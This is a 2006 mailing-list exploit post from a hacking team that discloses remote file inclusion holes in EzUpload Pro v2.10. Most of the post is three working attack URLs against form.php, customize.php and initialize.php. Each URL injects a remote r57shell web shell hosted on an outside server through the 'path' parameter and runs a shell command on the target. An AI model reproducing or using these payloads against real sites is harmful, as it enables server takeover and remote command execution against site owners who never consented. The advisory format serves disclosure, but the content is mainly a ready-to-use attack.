multiple file include exploits in EzUpload Pro v2.10

black-cod3 Mon, 29 May 2006 09:48:33 -0700

multiple file include exploits in EzUpload Pro v2.10


forum type : EzUpload Pro v2.10 

bug found by : black-code & sweet-devil

team : site-down

type : file include 


####################################################

exploits :



form.php


http://www.example.com/path/form.php?path=http://rst.void.ru/download/r57shell.txt?&cmd=pwd


customize.php


http://www.example.com/arab3upload/customize.php?path=http://rst.void.ru/download/r57shell.txt?&cmd=pwd


initialize.php


http://www.example.com/arab3upload/initialize.php?path=http://rst.void.ru/download/r57shell.txt?&cmd=pwd


####################################################


path to admin login:


#######################

emails: 


[EMAIL PROTECTED]  &  [EMAIL PROTECTED]

#######################



All my respect to our friends , lezr.com , g123g.net 



done .. peace

multiple file include exploits in EzUpload Pro v2.10

Reply via email to